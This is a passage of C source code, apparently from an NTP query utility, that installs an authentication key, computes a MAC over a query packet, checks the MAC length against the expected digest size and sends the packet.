                        return 1;
                }
                authusekey(info_auth_keyid, info_auth_keytype,
                           (u_char *)pass);
                authtrust(info_auth_keyid, 1);
        }
  
        /*
         * Do the encryption.
         */
        maclen = authencrypt(info_auth_keyid, (void *)&qpkt, pktsize);
        if (!maclen) {  
                fprintf(stderr, "Key not found\n");
                return 1;
        } else if ((size_t)maclen != (info_auth_hashlen + sizeof(keyid_t))) {
                fprintf(stderr,
                        "%d octet MAC, %lu expected with %lu octet digest\n",
                        maclen, (u_long)(info_auth_hashlen + sizeof(keyid_t)),
                        (u_long)info_auth_hashlen);
                return 1;
        }
          
        return sendpkt((char *)&qpkt, pktsize + maclen);
}